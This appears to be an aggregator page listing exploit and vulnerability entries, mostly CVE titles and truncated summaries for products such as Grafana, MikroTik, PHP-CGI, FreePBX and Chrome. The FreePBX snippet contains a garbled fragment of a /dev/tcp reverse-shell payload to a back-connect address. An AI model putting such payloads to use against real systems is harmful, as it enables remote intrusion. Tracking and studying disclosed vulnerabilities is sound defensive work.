Exploit for Path Traversal in Grafana

CVE-2021-43798-Exploit-for-Windows-and-Linux Modified exploit...

Exploit for CVE-2025-23369

CVE-2025-23369 CVE-2025-...

Exploit for Observable Timing Discrepancy in Mikrotik Routeros

CVE-2024-54772 MikroTik-RouterOS Username Enum This repo con...

Exploit for CVE-2024-57784

CVE-2024-57784 Exploit Title: Authenticated Directory...

Vulnerabilities-Proofs-of-Concept

Vulnerabilities Proofs-of-Concept This repository hosts proof...

About Elevation of Privilege – Windows Kernel Streaming WOW Thunk Service Driver (CVE-2024-38144) vulnerability

About Elevation of Privilege - Windows Kernel Streaming WOW Thunk Service Driver CVE-2024-38144 vulnerability. The vulnerability is from the August Microsoft Patch Tuesday. It wasn't highlighted in reviews; all we knew was that a local attacker could gain SYSTEM privileges. Three and a half month...

Exploit for Unrestricted Upload of File with Dangerous Type in Cleo Harmony

更多PoC见 https://pc.fenchuan8.com//index?for...

Exploit for Command Injection in Totolink A6000R_Firmware

TOTOLINKpoc TOTOLINK A6000R 命令执行漏洞（CVE-2024-41319） pytho...

Exploit for Use After Free in Linux Linux_Kernel

CVE-2024-0582 A data-only attack based on CVE-2024-0582 De...

CVE-2024-48956

Serviceware Processes 6.0 through 7.3 before 7.4 allows attackers without valid authentication to send a specially crafted HTTP request to a service endpoint resulting in remote code execution...

Exploit for CVE-2024-42327

PoC and Exploit for CVE-2024-42327 / ZBX-25623 A non-admin us...

Exploit for Path Traversal in Lfprojects Mlflow

CVE-2024-2928 Arbitrary file read exploit for CVE-2024-2928 in...

Adobe Dimension out-of-bounds write vulnerability (CNVD-2024-44529)

Adobe Dimension is the United States of America Odo than Adobe company is a set of 2D and 3D composite design tools. Adobe Dimension suffers from an out-of-bounds write vulnerability that can be exploited by an attacker to execute arbitrary code...

Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rexml/document' class MetasploitModule 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool', 'Description' = %q The BVSMWeb portal in the web framework...

Exploit for Heap-based Buffer Overflow in Microsoft

CVE-2024-26229 Beacon Object Files Beacon Object File BOF i...

Exploit for OS Command Injection in Php

CVE-2024-4577, Argument Injection in PHP-CGI ./CVE-2024-45...

FreePBX 16 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

Vulnerabilities fixed in Google Chrome

Google has fixed vulnerabilities in Chrome. A malicious person could exploit the vulnerabilities to execute arbitrary code with the victim's privileges, or to access sensitive data in the context of the browser. Of the vulnerability with attribute CVE-2024-4947, Google says it has information tha...

Exploit for CVE-2024-27983

This repository builds up a vulnerable HTTP2 Node.js server se...

GNU GRUB2 Post-Release Reuse Vulnerability

GNU GRUB2 is a Linux system bootloader from the American GNU community. GNU GRUB2 suffers from a post-release reuse vulnerability that originates from a confusion in the program's instructions responsible for freeing memory. An attacker could exploit this vulnerability to cause a program crash,...